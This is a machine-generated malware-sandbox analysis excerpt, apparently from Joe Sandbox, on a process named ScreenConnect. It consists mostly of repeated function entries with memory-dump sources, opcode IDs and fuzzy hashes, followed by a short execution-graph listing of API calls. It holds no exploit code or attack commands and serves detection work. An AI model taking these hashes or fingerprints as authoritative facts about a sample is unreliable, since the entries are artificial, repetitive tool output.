                                                                                                                                                                      • Instruction Fuzzy Hash: B5216F71A0591D8FEBA4EF69C869BA477F1FF69300F0141E9D45DD72A2DE34AD808B00
                                                                                                                                                                      Function 00007FFD9B60D420 Relevance: .1, Instructions: 77COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.3608139882.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ffd9b600000_ScreenConnect.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 142c5ecb5e2d1402c25399255d414f017e5ba7e2eb0a78130284759c2c12152c
                                                                                                                                                                      • Instruction ID: ce921c48618a870853187c564a67e12d3d06b55e307913861548c2d7a1476b46
                                                                                                                                                                      • Opcode Fuzzy Hash: 142c5ecb5e2d1402c25399255d414f017e5ba7e2eb0a78130284759c2c12152c
                                                                                                                                                                      • Instruction Fuzzy Hash: 1C21E532A0D6694FD726EF6DC8A56E47BB0EF42314F0502FBC099CB1A3CE242986C741
                                                                                                                                                                      Function 00007FFD9B60BB94 Relevance: .1, Instructions: 72COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.3608139882.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ffd9b600000_ScreenConnect.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 4936236bd288a6acaaa09e1f0cbafc62547ac53fb19dd2bd13b65442e7041fa4
                                                                                                                                                                      • Instruction ID: b924f2d5b80e6d4d7ab0d9c7adc33d1e8e876a1389d8f04bc91f7a5133b23845
                                                                                                                                                                      • Opcode Fuzzy Hash: 4936236bd288a6acaaa09e1f0cbafc62547ac53fb19dd2bd13b65442e7041fa4
                                                                                                                                                                      • Instruction Fuzzy Hash: 8F11C835B0D10E4FE72CAA96E8665F83780EF86225F05007ED1AECB593DE2A75178681
                                                                                                                                                                      Function 00007FFD9B6064BD Relevance: .1, Instructions: 71COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.3608139882.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ffd9b600000_ScreenConnect.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 2cdc6e8dd3b506e1684ba1e03c03e94ea3b690eee706ce4716a703b4b8c05453
                                                                                                                                                                      • Instruction ID: 7b7fb919e1d3356663403b8faf3d759f78343869060b3a69f7d8f8c736073dbf
                                                                                                                                                                      • Opcode Fuzzy Hash: 2cdc6e8dd3b506e1684ba1e03c03e94ea3b690eee706ce4716a703b4b8c05453
                                                                                                                                                                      • Instruction Fuzzy Hash: BB117572E0EA4C4FDF91DFA648B50A87FA1EF56304F0500EAE1ACD71A2EA25A905C741
                                                                                                                                                                      Function 00007FFD9B604990 Relevance: .1, Instructions: 66COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.3608139882.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ffd9b600000_ScreenConnect.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 87bb34c3e6bc83ad2087cd244f37353a303c7d4ece5480ec406206842885f80a
                                                                                                                                                                      • Instruction ID: df2a642d3d3cbfdb0cc784a69a4a9da11ed9c1835ab4f63dff890bed295316c6
                                                                                                                                                                      • Opcode Fuzzy Hash: 87bb34c3e6bc83ad2087cd244f37353a303c7d4ece5480ec406206842885f80a
                                                                                                                                                                      • Instruction Fuzzy Hash: 6001C463A4FACD1FD76292B618A61B07FB0DF57211B0A01EFD0D5CB0E3D94D288A8352
                                                                                                                                                                      Function 00007FFD9B606D6C Relevance: .1, Instructions: 63COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.3608139882.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ffd9b600000_ScreenConnect.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: d94ef4228c479d68a7f8efb1911fb3f15dc29bcd9aea6a3c1baab5e9edd3fd28
                                                                                                                                                                      • Instruction ID: 8d06892f2f0b5725c34b2d4887e044c0e6987239de65571ff7a99983cb894afc
                                                                                                                                                                      • Opcode Fuzzy Hash: d94ef4228c479d68a7f8efb1911fb3f15dc29bcd9aea6a3c1baab5e9edd3fd28
                                                                                                                                                                      • Instruction Fuzzy Hash: 05118471B0F64F0AFEB99A9744B02B45A91EF57344F8A017CD8ED8E1E7DE18B9059240
                                                                                                                                                                      Function 00007FFD9B60281C Relevance: .1, Instructions: 61COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.3608139882.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ffd9b600000_ScreenConnect.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 0aaf92acb347dcf82aa1c0e53c2f6b0ad5f19eabfd8bcc9f67ce0513aec83af7
                                                                                                                                                                      • Instruction ID: 912857176e982d92135fb6ecc8ae567d7965dbd9c50ee1a7de33a02b9fb9eab0
                                                                                                                                                                      • Opcode Fuzzy Hash: 0aaf92acb347dcf82aa1c0e53c2f6b0ad5f19eabfd8bcc9f67ce0513aec83af7
                                                                                                                                                                      • Instruction Fuzzy Hash: B9119371B0994A4FDB98EF6A8060B657791FF69300B0541F8D49DCB297CE35FD458780
                                                                                                                                                                      Function 00007FFD9B602885 Relevance: .1, Instructions: 60COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.3608139882.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ffd9b600000_ScreenConnect.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: a0835c52e3fe117fc871426542f110b442d639fd623f314199a193adc4f772b5
                                                                                                                                                                      • Instruction ID: 0b5f524f5fd6f9dc27f5d9c09b8f38332e4eb6790b4fcd9742cec8737d25248b
                                                                                                                                                                      • Opcode Fuzzy Hash: a0835c52e3fe117fc871426542f110b442d639fd623f314199a193adc4f772b5
                                                                                                                                                                      • Instruction Fuzzy Hash: 50119071B099494FDB98EF6A8060B617792FF69300B0541E8D49DCB29BCE35F9458780
                                                                                                                                                                      Function 00007FFD9B605399 Relevance: .1, Instructions: 59COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.3608139882.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ffd9b600000_ScreenConnect.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: b881cd203fa4c9ad8d7949ba8be69af339156b83cafd0fb8f5ed2ddd4efdd6a3
                                                                                                                                                                      • Instruction ID: 0322a78aeff6132dad4ae56b5baf8aaabd4cc4ed6f544ef7bd837d78aad08a89
                                                                                                                                                                      • Opcode Fuzzy Hash: b881cd203fa4c9ad8d7949ba8be69af339156b83cafd0fb8f5ed2ddd4efdd6a3
                                                                                                                                                                      • Instruction Fuzzy Hash: D8112911F0E75B0FE77D966B48B13B52AE1DF42340F1A40BAC499CA1E6EC6CAD85C311
                                                                                                                                                                      Function 00007FFD9B604519 Relevance: .1, Instructions: 52COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.3608139882.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ffd9b600000_ScreenConnect.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 1cd7155eb99c5331a975d9363826be3d43edd67dfcb7e553cd324e57d30c1c72
                                                                                                                                                                      • Instruction ID: 395593e86649eca7111b9d86a0980932eb71cfedcf4a0ce93889051fed625346
                                                                                                                                                                      • Opcode Fuzzy Hash: 1cd7155eb99c5331a975d9363826be3d43edd67dfcb7e553cd324e57d30c1c72
                                                                                                                                                                      • Instruction Fuzzy Hash: E501A92274EBCD0FD7A69A6E58691B07FF0EF9B11530901EBE4C8CB273E9156C558381
                                                                                                                                                                      Function 00007FFD9B604A15 Relevance: .0, Instructions: 42COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.3608139882.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ffd9b600000_ScreenConnect.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: edc7ccd106261ec723520a86d10858ca0999e0b603b6cd7c83a89e583240bd99
                                                                                                                                                                      • Instruction ID: 618e66bc2bb9b8924298613212d92734526a626ced1b5ef5588b6fcb3f740de1
                                                                                                                                                                      • Opcode Fuzzy Hash: edc7ccd106261ec723520a86d10858ca0999e0b603b6cd7c83a89e583240bd99
                                                                                                                                                                      • Instruction Fuzzy Hash: 4EF0F9736098494FEB94FE5EC099E2433E1DFA534030500BEA059CB17BDD15A9018740
                                                                                                                                                                      Function 00007FFD9B60E310 Relevance: .0, Instructions: 40COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.3608139882.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ffd9b600000_ScreenConnect.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: d22a63bb5e20613daae5bfa7502e076fb13a4821f834d11682084cce05a3c913
                                                                                                                                                                      • Instruction ID: 5bc92de85b14cf6376012ec7c57792d5076f87271d9efb66153213032a9507d2
                                                                                                                                                                      • Opcode Fuzzy Hash: d22a63bb5e20613daae5bfa7502e076fb13a4821f834d11682084cce05a3c913
                                                                                                                                                                      • Instruction Fuzzy Hash: 8AE09BB114E50C6EA61CAA55AC079F7779CE747134F00111FE18E85012F156B5238295
                                                                                                                                                                      Function 00007FFD9B60CFD6 Relevance: .0, Instructions: 39COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.3608139882.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ffd9b600000_ScreenConnect.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: bf2efe4d7021bb80bf4d8af437a27b8c821f0f30994a593aa0671aa1ddd4b5b5
                                                                                                                                                                      • Instruction ID: cfbe134eb0716f7cb2768f202c36d554281f120d867da6b82a96872d964a7233
                                                                                                                                                                      • Opcode Fuzzy Hash: bf2efe4d7021bb80bf4d8af437a27b8c821f0f30994a593aa0671aa1ddd4b5b5
                                                                                                                                                                      • Instruction Fuzzy Hash: 24F02872A0D68C1FEB10DFA9886A4FD7FF0EF82200F0500E7D45CCB062EA247A598741
                                                                                                                                                                      Function 00007FFD9B60D47D Relevance: .0, Instructions: 35COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.3608139882.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ffd9b600000_ScreenConnect.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: f47db5e907bd1568b51ce40cd48f0ff60f6a04b927cb69741ec554da32a09882
                                                                                                                                                                      • Instruction ID: 7599b9eb853dc4d6e4aad7dcc3109ca65314c218fba19491ab840e7343d9459c
                                                                                                                                                                      • Opcode Fuzzy Hash: f47db5e907bd1568b51ce40cd48f0ff60f6a04b927cb69741ec554da32a09882
                                                                                                                                                                      • Instruction Fuzzy Hash: 61F04434A04A5C8FDB59EB18C8A87A9B7F0FB54301F0002ADC40EE3351DF346A85CB45
                                                                                                                                                                      Function 00007FFD9B604409 Relevance: .0, Instructions: 32COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.3608139882.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ffd9b600000_ScreenConnect.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: c10e6e20110581779b863501aee46d9f31cef2d81e1c200d3dca7bcf64136299
                                                                                                                                                                      • Instruction ID: 1937ad049f2b3196b3eb4a3c290403e372fd587987e9fe2b11432b8b88dea367
                                                                                                                                                                      • Opcode Fuzzy Hash: c10e6e20110581779b863501aee46d9f31cef2d81e1c200d3dca7bcf64136299
                                                                                                                                                                      • Instruction Fuzzy Hash: 4CF0F032A1978D4FC316AB30887A6A97FB1BF45204B8400EFE01CCB1EBEE389904C741
                                                                                                                                                                      Function 00007FFD9B603A99 Relevance: .0, Instructions: 32COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.3608139882.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ffd9b600000_ScreenConnect.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 3edc34cbc1c8fa39d59eff821eacd17a1cd8efaa216543f3d51ded3f8215c2b0
                                                                                                                                                                      • Instruction ID: a6c98595ddf0e8127303e98a712a890133edb071e8045c55c85344d2a506899a
                                                                                                                                                                      • Opcode Fuzzy Hash: 3edc34cbc1c8fa39d59eff821eacd17a1cd8efaa216543f3d51ded3f8215c2b0
                                                                                                                                                                      • Instruction Fuzzy Hash: C1F0303540968C9FCF46DB68D4618D97B70FF16321B0501C6E099CB052D7219A55CB82
                                                                                                                                                                      Function 00007FFD9B6005B1 Relevance: .0, Instructions: 31COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.3608139882.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ffd9b600000_ScreenConnect.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 94238d326c8f275d8c7410ec35d7f1518f9fd1f48b06161a5730d0c80e665684
                                                                                                                                                                      • Instruction ID: d2a052c5b29fce5fa72c0f6d111ace0c5ad18bbb2ffc1e5d5ebf42b56f2f630d
                                                                                                                                                                      • Opcode Fuzzy Hash: 94238d326c8f275d8c7410ec35d7f1518f9fd1f48b06161a5730d0c80e665684
                                                                                                                                                                      • Instruction Fuzzy Hash: 68E09A2110F3D81FDB539B3988A88E43FA0AE1322030902EFE4818F4B3E5199A89C742
                                                                                                                                                                      Function 00007FFD9B6053B0 Relevance: .0, Instructions: 24COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.3608139882.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ffd9b600000_ScreenConnect.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 450544b5d5d97aac28a20be79b34d9073a27735aeb7ffb1963148b7ad88e3071
                                                                                                                                                                      • Instruction ID: 0bcd6411c6520cbe9182be11120ce50303967c9718584ba32306bb4ad0f6e9f4
                                                                                                                                                                      • Opcode Fuzzy Hash: 450544b5d5d97aac28a20be79b34d9073a27735aeb7ffb1963148b7ad88e3071
                                                                                                                                                                      • Instruction Fuzzy Hash: 48E08C26B4E61B43FB7C25A768E23B560D08F06351F4A407A942DC40E9EC9CAE808592
                                                                                                                                                                      Function 00007FFD9B602639 Relevance: .0, Instructions: 23COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.3608139882.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ffd9b600000_ScreenConnect.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: f518bdd11283ad14f5167fbb65453287231b4122e2dfb4e946d0df1b2f0c417a
                                                                                                                                                                      • Instruction ID: e68a83779060210e64954ee8739035c2e3f648c56deba42e7569bbf37c426893
                                                                                                                                                                      • Opcode Fuzzy Hash: f518bdd11283ad14f5167fbb65453287231b4122e2dfb4e946d0df1b2f0c417a
                                                                                                                                                                      • Instruction Fuzzy Hash: 0BE06890F1EA8E0BE71DEA22442182A7381FF14200B0100FAC09E970DBDC28BD014380
                                                                                                                                                                      Function 00007FFD9B60BAFA Relevance: .0, Instructions: 22COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.3608139882.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ffd9b600000_ScreenConnect.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: b42b423f1aa1dfbd5b371c09d02e0e46b82ac7ad4654ed683eb091f2c8be602a
                                                                                                                                                                      • Instruction ID: 2bebb2675f7d2bbf932e0e7aa45f2a40f324c03d28094ce254696b0244d9a0d8
                                                                                                                                                                      • Opcode Fuzzy Hash: b42b423f1aa1dfbd5b371c09d02e0e46b82ac7ad4654ed683eb091f2c8be602a
                                                                                                                                                                      • Instruction Fuzzy Hash: E8E04F31F1A95E8BDAF8AE5A846477433C2FB99348B594434805ECB294DE25B9014B40
                                                                                                                                                                      Function 00007FFD9B60E1A3 Relevance: .0, Instructions: 22COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.3608139882.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ffd9b600000_ScreenConnect.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 8ea3b9bcf005a40ffd3e9ba3ffac0108fd7a55c4df9a97c37cb5a0c126ce105c
                                                                                                                                                                      • Instruction ID: 3aff2f63cca81742a2999dc21b7ae44f553c7371d1e93898c821c75660df82c0
                                                                                                                                                                      • Opcode Fuzzy Hash: 8ea3b9bcf005a40ffd3e9ba3ffac0108fd7a55c4df9a97c37cb5a0c126ce105c
                                                                                                                                                                      • Instruction Fuzzy Hash: 40E01A31A1051C8ECB64EB6598556ECB371EF85310F4001F6D22ED21A1CE3469818B00
                                                                                                                                                                      Function 00007FFD9B608C94 Relevance: .0, Instructions: 18COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.3608139882.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ffd9b600000_ScreenConnect.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: c0fba3318a37b32016f8ab8780becabf0a8838d2fdb6fb7a001a024ee4fb1578
                                                                                                                                                                      • Instruction ID: c0c13b09fbc042050cee7ac372a36384cbf0e7043e6e8309c2d31e0eb2a057f0
                                                                                                                                                                      • Opcode Fuzzy Hash: c0fba3318a37b32016f8ab8780becabf0a8838d2fdb6fb7a001a024ee4fb1578
                                                                                                                                                                      • Instruction Fuzzy Hash: 26E0123114F6C50FD716EB75986CC547F90DE2721434A04EEC185CF1B3E95A9948C741
                                                                                                                                                                      Function 00007FFD9B602924 Relevance: .0, Instructions: 8COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.3608139882.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ffd9b600000_ScreenConnect.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 0f82583ea56ef5179abe021cc74fc55130002209f7b4f0b3b1bf58f5b50dd4be
                                                                                                                                                                      • Instruction ID: 0eb13a167ce1b03736f4ee32cae5fcc7303c3cdc5e11cc3f5c24f65e70ce3975
                                                                                                                                                                      • Opcode Fuzzy Hash: 0f82583ea56ef5179abe021cc74fc55130002209f7b4f0b3b1bf58f5b50dd4be
                                                                                                                                                                      • Instruction Fuzzy Hash: 42C09B10F1A54F86F165EBE5447117F1552EF8D600B524435E41DC51A6CD3C77015545

                                                                                                                                                                      Execution Graph

                                                                                                                                                                      Execution Coverage:12.8%
                                                                                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                      Signature Coverage:0%
                                                                                                                                                                      Total number of Nodes:10
                                                                                                                                                                      Total number of Limit Nodes:1
                                                                                                                                                                      execution_graph 15609 7ffd9b5f8e54 15612 7ffd9b5f8e5d 15609->15612 15610 7ffd9b5f9002 GlobalMemoryStatusEx 15611 7ffd9b5f9025 15610->15611 15612->15610 15613 7ffd9b5f8f52 15612->15613 15604 7ffd9b2e8014 15606 7ffd9b2e801d 15604->15606 15605 7ffd9b2e8082 15606->15605 15607 7ffd9b2e80f6 SetProcessMitigationPolicy 15606->15607 15608 7ffd9b2e8152 15607->15608

                                                                                                                                                                      Executed Functions

                                                                                                                                                                      Function 00007FFD9B5F8E54 Relevance: 1.8, APIs: 1, Instructions: 276COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
